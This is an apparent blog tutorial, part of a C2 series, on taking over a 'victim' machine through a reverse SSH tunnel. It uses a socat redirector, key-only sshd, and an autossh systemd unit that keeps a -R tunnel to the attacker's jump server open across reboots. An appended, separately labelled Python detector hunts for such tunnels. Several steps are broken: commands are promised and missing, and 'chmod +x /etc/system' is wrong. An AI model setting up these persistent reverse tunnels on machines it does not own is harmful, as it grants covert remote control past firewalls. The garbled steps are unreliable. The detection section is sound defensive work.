It is time for part 2 in this series on setting up a Command and Control, and this time I am using ssh to create a reverse ssh tunnel to my C2-1 server. So I can run ssh from a client machine and take over that machine from my C2-1 server. A picture says more than 1000 words, so let's start with that!
- Run socat
- Install ssh server on C2-1 server
- Configure C2-1 server for key login and no passwords
- Generate keys to use with autossh
- Install autossh
- Run autossh
- Autostart autossh
- Access remote machine
We set up socat in part 1, so go there if you want a little more info.
Start the socat server and map port 21 to the ssh server on the C2-1 server on port 22 (replace the placeholder with the internal IP of the C2-1 server)
sudo socat TCP4-LISTEN:21,fork,reuseaddr TCP4:<C2-1-IP>:22
Second, we install the ssh server on the C2-1 server, if it is not already installed
apt-get install openssh-server
How to enable key login for ssh server
vi /etc/ssh/sshd_config and set PubkeyAuthentication to yes, save the file and run
We have now created an ssh server on the C2-1 server with only key logins. We have also used the socat server to forward any ssh connection from the public IP to our C2-1 server!
Because this is only a PoC and for my own joy, I do not think too much about security, so I use the same public key for many things. Let me explain. We use keys to access the ssh server. Which keys we can use is configured on the ssh server in the file ~/.ssh/authorized_keys
In that file is the public key from the client that will access the ssh server. So I generate my own key pair, which gives me a public key. I do that with this command. (I did this on my workstation)
Then I take the contents of the file ~/.ssh/id_rsa.pub in my home directory and put that in authorized_keys on the C2-1 server.
Copy what that command shows and paste it into ~/.ssh/authorized_keys on the C2-1 server.
Let's try it out!
We have now gone almost all the way.
We can connect from a client to the C2-1 server through the socat server on port 21 with keys, no password.
What we want to do now is to do this in a more automatic way, and even if the client machine reboots we want it to reconnect.
Wait, at the beginning we talked about reverse stuff, not just ssh to a server.
Our client connects to the C2-1 server with ssh. But we want to use that ssh tunnel to connect back to the client, as the name says: reverse ssh. Look at the picture at the beginning. I hope you get my point.
Let's do this manually first with ssh.
Victim -> ssh -> C2-1 server, then I, who own the C2-1 server, ssh to a local port on the C2-1 server and get access to the Victim.
We do this with this ssh command from the Victim to the C2-1 server.
ssh -4 -R 8889:localhost:22 c2-1@my-jump-server -p 21 -v
ssh is the command
-4 is for IPv4
-R is for reverse tunnel
8889 is the port on the C2-1 server that we can access the victim from
22 is the victim's ssh port
c2-1@my-jump-server is my C2 server, which I connect to with ssh on port 21
So the victim has now connected to my C2 server.
Now it is time for me to connect to the victim. And I will do this now.
I have a console on my C2-1 machine and ssh to the local port that was defined above.
ssh roger@localhost -p 8889
I now have ssh access to the victim through the C2 server.
But what will happen if the victim reboots or kills ssh? That is where autossh comes in.
This is an application that reconnects the ssh connection between the victim and the C2 server.
I refer to Victim and C2 so it will be easier to understand what I am talking about.
Let's configure autossh.
Earlier we configured keys to use with ssh. Why? We could use a password. But when we want to use autossh we must use keys and no passwords. That is why.
Let's install autossh
apt-get install autossh
Then we can try the command manually
autossh -N -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -i /home/roger/.ssh/id_rsa.key -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -R 6666:localhost:22 c2-1@my-jump-server -p 443
Then we move to our C2 server and connect to the victim through port 6666
ssh roger@localhost -p 6666
But what if we reboot the victim machine? So now we want to create a service for autossh.
Paste the below into the autossh.service unit file. Change the values to meet your requirements.
[Unit]
Description=AutoSSH service
After=network.target

[Service]
Environment="AUTOSSH_GATETIME=0"
User=roger
Group=roger
ExecStart=/usr/bin/autossh -N -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -i /home/user/.ssh/id_rsa.key -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -R 6666:localhost:22 c2-1@my-jump-server -p 443
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target
Then we change the file to be executable
chmod +x /etc/system
Then we enable this as a service
systemctl enable autossh.service
systemctl start autossh.service
When do we use this? This is great to use if you have a machine where incoming communication is blocked! Then we reverse the ssh, so the victim opens an ssh tunnel out and creates a reverse tunnel on the C2 server for us to access.
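From the defender's side, this setup leaves two artefacts: an autossh (or ssh) unit on the victim whose ExecStart carries a -R forward, and an sshd-owned listener on a port sshd was never configured to serve on the server end of the tunnel (here 127.0.0.1:6666). The Python below is an added example, not code from this post, that hunts for both; the ss -tlnp output and the unit text are constructed to match the post, and the sshd_ports default assumes sshd only listens on port 22.

```python
"""Hunt for reverse-SSH tunnel artefacts: -R in an ExecStart, and sshd listeners off its Port."""
import shlex

# Constructed `ss -tlnp` output for the server end of the tunnel (not a real capture).
SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=801,fd=3))
LISTEN 0      128    127.0.0.1:6666      0.0.0.0:*         users:(("sshd",pid=4121,fd=9))
LISTEN 0      128    127.0.0.1:631       0.0.0.0:*         users:(("cupsd",pid=650,fd=7))
"""

# Constructed unit text modelled on the autossh.service above (not a real file).
UNIT_SAMPLE = """\
[Service]
User=roger
ExecStart=/usr/bin/autossh -N -M 0 -o "ServerAliveInterval 30" -R 6666:localhost:22 c2-1@my-jump-server -p 443
"""


def sshd_extra_listeners(ss_output, sshd_ports=(22,)):
    """Return (address, port) for every sshd-owned listener whose port is not a
    configured sshd Port; on a server such listeners are remote (-R) forwards."""
    found = []
    for line in ss_output.splitlines()[1:]:          # skip the header row
        cols = line.split()
        if len(cols) < 6 or '"sshd"' not in cols[5]:
            continue
        addr, _, port = cols[3].rpartition(":")     # also handles [::1]:6666
        if int(port) not in sshd_ports:
            found.append((addr, int(port)))
    return found


def remote_forwards_in_unit(unit_text):
    """Return the -R specs of any ssh/autossh command in a unit's ExecStart lines."""
    specs = []
    for line in unit_text.splitlines():
        if not line.startswith("ExecStart="):
            continue
        argv = shlex.split(line[len("ExecStart="):])  # respects the quoted -o values
        if not argv or argv[0].rsplit("/", 1)[-1] not in ("ssh", "autossh"):
            continue
        for i, arg in enumerate(argv):
            if arg == "-R" and i + 1 < len(argv):
                specs.append(argv[i + 1])
            elif arg.startswith("-R") and len(arg) > 2:  # -R6666:localhost:22 form
                specs.append(arg[2:])
    return specs
```

On a live host, feed it the real `ss -tlnp` output and the unit files under /etc/systemd/system and ~/.config/systemd/user; a hit on either side is worth a closer look at the session and the key that authenticated it.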